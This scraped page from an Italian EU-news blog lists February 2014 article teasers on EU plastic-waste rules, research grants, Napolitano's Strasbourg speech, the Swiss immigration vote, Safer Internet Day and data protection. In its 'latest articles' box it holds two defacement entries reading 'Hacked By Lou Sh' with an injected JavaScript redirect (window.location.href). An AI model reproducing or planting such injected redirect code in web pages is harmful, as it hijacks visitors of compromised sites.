EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Febbraio 2014
it

Il Parlamento europeo ha recentemente approvato una risoluzione secondo la quale entro il 2020 alcuni dei rifiuti plastici più pericolosi per l’uomo e inquinanti per l’ambiente dovranno essere banditi. L’Unione europea, inoltre, dovrà impegnarsi affinché vengano introdotti obiettivi in materia di raccolta, riciclaggio e recupero della plastica che risultino vincolanti per tutti gli Stati membri.

L’enorme potenziale economico derivante dal riciclaggio di materiale plastico è in gran parte inutilizzato; ad oggi, infatti, soltanto il 25% dei rifiuti plastici viene smaltito correttamente. È quanto denunciato dal Parlamento europeo, nella risoluzione approvata martedì 14 gennaio. Un dato (...)

it

Il 14 gennaio 2014 il Parlamento europeo ha reso noto, attraverso un comunicato, il finanziamento di importanti progetti di ricerca. In un momento in cui il progresso scientifico è minato dalle politiche di austerity che molti Stati europei stanno adottando per fronteggiare la crisi, l’UE sceglie di schierarsi al fianco dei ricercatori, stanziando a loro favore un totale di 575 milioni di euro, con un contributo medio assegnato di 1.84 milioni di euro fino a un massimo di 2.75 milioni di euro.

Nell’ ambito della prima competizione Consolidator Grant (un bando di concorso per l’assegnazione di fondi riservato a ricercatori con un ampio bagaglio di esperienza), il Consiglio Europeo della ricerca ha selezionato le proposte di 312 scienziati, i quali potranno continuare e migliorare i loro (...)

it

"La messa in discussione dei valori dell'Unione europea è, per la prima volta, il contesto in cui ci si avvia alle prossime elezioni europee. Sarà il momento della verità, perché sono evidenti le ragioni del disincanto dei cittadini per il peggioramento delle condizioni di vita. Non regge più la politica di austerità a ogni costo, risposta prevalente alla crisi in zona euro".

Giorgio Napolitano apre il suo discorso al Parlamento europeo di Strasburgo riunito in sessione plenaria consapevole che mai in passato, nonostante crisi via via insorte e poi superate tra Stati membri della UE, era stata messa seriamente in discussione la prosecuzione del cammino intrapreso. (...)

it

Chiudere le frontiere agli stranieri e limitare la libera circolazione, mettendo un freno anche al numero di lavoratori frontalieri. Questo il succo della proposta di legge popolare “basta immigrazione di massa” che gli svizzeri hanno approvato al referendum dello scorso 9 febbraio.

Quello della lotta all’immigrazione e al fenomeno del frontalierato è un vecchio pallino dell’Udc svizzera, partito di destra che già tre anni fa si impose nelle cronache di casa nostra per aver promosso una campagna di affissioni che prendeva di mira i frontalieri italiani, raffigurati come topi (...)

it

Martedì 11 febbraio, in oltre 100 Paesi (e per la prima volta anche negli Stati Uniti), è stato celebrato il Safer Internet Day, un’iniziativa della Commissione europea, giunta ormai all’undicesima edizione, che ha avuto come fine quello di promuovere, soprattutto tra i più giovani, un utilizzo sicuro e responsabile dei media.

Erano gli anni Sessanta quando il Dipartimento di Difesa statunitense decise di collegare tra di loro alcune università che si occupavano di progetti militari, sfruttando linee di telecomunicazione ad alta velocità. L’obiettivo era semplice: mettere a punto un sistema di difesa e di (...)

it

Il web è pieno di pericoli e chiunque può cadere nella trappola del cybercrime. Aziende e cittadini vanno tutelati. E’ proprio questo l’arduo compito del Centro Europeo per la lotta alla criminalità informatica, che da un anno lavora a stretto contatto con le autorità nazionali per garantire una navigazione più sicura. I primi dodici mesi sono stati intensi e la Commissione europea ha deciso di far conoscere i traguardi raggiunti dall'Ufficio e i futuri obiettivi.

Le Istituzioni europee hanno riservato, fin dal principio, un posto di particolare rilievo al cittadino e alla tutela dei suoi diritti. Da sempre l’Unione europea ha svolto le proprie attività focalizzando l’attenzione sui cittadini in modo da poter garantire loro una vita migliore al riparo (...)

it

Lo scorso 28 gennaio, in occasione del Data Protection Day, il Consiglio europeo ha presentato la prima guida onnicomprensiva delle norme che regolano il trattamento dei dati personali. Ciò testimonia la rinnovata attenzione dell’Unione europea riguardo i possibili utilizzi dei dati dei cittadini, soprattutto in seguito alle rivelazioni shock di Edward Snowden sui programmi di sorveglianza di massa di cui si servirebbe tanto il governo statunitense quanto quello britannico.

La guida è stata realizzata dal Consiglio europeo in collaborazione con l’Agenzia europea per i diritti fondamentali e la Corte europea per i diritti umani. Essa rappresenta un vademecum destinato a tutti coloro che si approcciano per la prima volta alla questione del trattamento dei dati (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France